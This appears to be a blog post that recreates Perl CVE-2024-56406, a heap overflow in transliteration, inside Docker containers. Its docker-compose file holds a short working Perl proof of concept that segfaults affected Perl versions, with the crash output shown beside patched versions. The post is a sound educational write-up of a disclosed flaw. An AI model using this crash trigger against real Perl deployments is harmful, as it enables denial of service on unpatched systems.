CVE-2024-56406

Saturday, May 17, 2025| Tags: perl

DISCLAIMER: Image is generated using Leonardo AI.


In the earlier post where I discussed CVE in general and re-created CVE-2018-18311, CVE-2023-31486 and CVE-2023-47038.

Recently I found out about CPAN Security Group which is the CVE Numbering Authority (CNA) for CPAN and Perl.

At the Perl Toolchain Summit 2025, I had the honour to meet some of the members of the group i.e. Stig Palmquist and Breno Oliveira.

Continuing with the series, today I am talking about one more CVE-2024-56406.

This particular one affected v5.34, v5.36, v5.38 and v5.40.

It’s about heap buffer overflow when transliterating non-ASCII bytes.

According to the official document, the specific affected versions are below:


    from 5.40.0 until 5.40.2
    from 5.38.0 until 5.38.4
    from 5.36.0 through 5.36.3
    from 5.34.0 through 5.34.3

I will use the similar pattern as before and create docker container with affected Perl versions.

In that, I’ll also add couple of good ones as well.

This is my docker configuration file: docker-compose.yml


version: '3.8'

x-shared-config: &shared
    command: &perl_command
      - perl
      - -e
      - |
        $$_ = "\x{FF}" x 1000000;
        tr/\xFF/\x{100}/;
        print "If you see this, Perl didn't crash!!\n";
    deploy: &resource_limits
      resources:
        limits:
          memory: 2G

services:
  perl_5_34_0:
    <<: *shared
    container_name: perl_5_34_0
    image: perl:5.34.0

  perl_5_36_0:
    <<: *shared
    container_name: perl_5_36_0
    image: perl:5.36.0

  perl_5_38_0:
    <<: *shared
    container_name: perl_5_38_0
    image: perl:5.38.0

  perl_5_38_4:
    <<: *shared
    container_name: perl_5_38_4
    image: perl:5.38.4

  perl_5_40_0:
    <<: *shared
    container_name: perl_5_40_0
    image: perl:5.40.0

  perl_5_40_2:
    <<: *shared
    container_name: perl_5_40_2
    image: perl:5.40.2

In summary, I am creating the following services that would throw error as expected:


    perl_5_34_0
    perl_5_36_0
    perl_5_38_0
    perl_5_40_0

There are two more services perl_5_38_4 and perl_5_40_2 which should be safe and unaffected.

Finally it’s time to re-create the issues.


$ docker-compose run -rm perl_5_34_0
Creating cve-2024-56406_perl_5_34_0_run ... done
ERROR: 139


$ docker-compose run -rm perl_5_36_0
Creating cve-2024-56406_perl_5_36_0_run ... done
ERROR: 139


$ docker-compose run -rm perl_5_38_0
Creating cve-2024-56406_perl_5_38_0_run ... done
ERROR: 139


$ docker-compose run -rm perl_5_40_0
Creating cve-2024-56406_perl_5_40_0_run ... done
ERROR: 139

If you noticed, the exit code is 139 in the affected services.

As we know, Exit Code = Signal Number + 128 and the segfault signal number is 11.

And the good ones are:


$ docker-compose run -rm perl_5_38_4
Creating cve-2024-56406_perl_5_38_4_run ... done
If you see this, Perl didn't crash!!


$ docker-compose run -rm perl_5_40_2
Creating cve-2024-56406_perl_5_40_2_run ... done
If you see this, Perl didn't crash!!


Happy Hacking !!!

SO WHAT DO YOU THINK ?

If you have any suggestions or ideas then please do share with us.

Contact with me